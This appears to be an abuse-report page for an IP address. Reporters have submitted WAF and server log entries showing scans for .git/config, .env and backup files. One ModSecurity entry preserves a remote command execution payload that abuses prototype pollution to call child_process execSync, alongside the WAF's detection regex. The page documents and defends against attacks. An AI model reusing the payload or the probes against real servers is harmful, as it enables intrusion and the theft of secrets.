This IP address has been reported a total of
62
times from
40 distinct
sources.
35.244.42.79 was first reported on
, and the most recent report was
.
Recent Reports:
We have received reports of abusive activity from this IP address within the last week. It is
potentially still actively engaged in abusive activities.
[SatSep1902:00:14.3348232026][security2:error][pid2338953:tid2339005][client35.244.42.79:0]ModSecuri ...
show more[SatSep1902:00:14.3348232026][security2:error][pid2338953:tid2339005][client35.244.42.79:0]ModSecurity:Accessdeniedwithcode403\(phase2\).Patternmatch\"\(\?:\\\\\\\\\$\(\?:\\\\\\\\\(\(\?:\\\\\\\\\(.\*\\\\\\\\\)\|.\*\)\\\\\\\\\)\|\\\\\\\\{.\*\\\\\\\\}\)\|[\<\>]\\\\\\\\\(.\*\\\\\\\\\)\)\"atARGS:0.[file\"/etc/apache2/conf.d/modsec_rules/10_asl_rules.conf\"][line\"396\"][id\"393655\"][rev\"17\"][msg\"Atomicorp.comWAFRules:PossibleRemoteCommandExecution:UnixShellExpressionFound\"][data\"MatchedData:\$\(\(41\*271\)\)foundwithinARGS:0:{then:\$1:__proto__:thenstatus:resolved_modelreason:-1value:{then:\$b1337}_response:{_prefix:varres=process.mainmodule.require\(child_process\).execsync\(echo\$\(\(41\*271\)\)\|base64-w0\).tostring\(\).trim\(\)throwobject.assign\(newerror\(next_redirect\){digest:\`next_redirectpush/login\?a=\${res}307\`}\)_chunks:\$q2_formdata:{get:\$1:constructor:constructor}}}\"][tag\"attack-rce\"][hostname\"www.staging.swiss-sailing-system.ch\"][uri\"/\"][unique_id\"aq3QjhPAXu-5b2lCw4rTsgAAAAA\"]
show less
Automated scan detected: GET /.git/config โ UA: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 ( ...
show moreAutomated scan detected: GET /.git/config โ UA: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
show less
Auto-ban: single probe for restricted files (.env / backups / admin endpoints). Likely mass-scan on ...
show moreAuto-ban: single probe for restricted files (.env / backups / admin endpoints). Likely mass-scan on 2026-09-16.
show less
2026-09-17 20:02:23 GET /.env - - 35.244.42.79 HTTP/1.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/ ...
show more2026-09-17 20:02:23 GET /.env - - 35.244.42.79 HTTP/1.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/131.0.0.0+Safari/537.36 - 301 575
2026-09-17 20:02:24 GET /.env.local - - 35.244.42.79 HTTP/1.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/131.0.0.0+Safari/537.36 - 301 587
2026-09-17 20:02:26 GET /.env.production - - 35.244.42.79 HTTP/1.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/131.0.0.0+Safari/537.36 - 301 597
2026-09-17 20:02:27 GET /.env.staging - - 35.244.42.79 HTTP/1.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/131.0.0.0+Safari/537.36 - 301 591
2026-09-17 20:02:28 GET /.env.development - - 35.244.42.79 HTTP/1.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/131.0.0.0+Safari/537.36 - 301 599
...
show less
Web App Attack
Anonymous
Blocked by FortiWeb WAF ML threat detection. ML probability: 99%, Country: IN, Attack patterns: Word ...
show moreBlocked by FortiWeb WAF ML threat detection. ML probability: 99%, Country: IN, Attack patterns: WordPress scanning, Backup file probing, Cloud secrets probing
show less
[ThuSep1716:30:16.0511572026][security2:error][pid2298542:tid2298553][client35.244.42.79:0]ModSecuri ...
show more[ThuSep1716:30:16.0511572026][security2:error][pid2298542:tid2298553][client35.244.42.79:0]ModSecurity:Accessdeniedwithcode403\(phase2\).OperatorGEmatched5atTX:anomaly_score.[file\"/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"][line\"94\"][id\"949110\"][msg\"InboundAnomalyScoreExceeded\(TotalScore:5\)\"][severity\"CRITICAL\"][ver\"OWASP_CRS/3.3.10\"][tag\"application-multi\"][tag\"language-multi\"][tag\"platform-multi\"][tag\"attack-generic\"][hostname\"www.spicydesign.ch\"][uri\"/.env.sample\"][unique_id\"aqv5eAbAZ0Sp3qoIOPcAbQAAAAA\"]
show less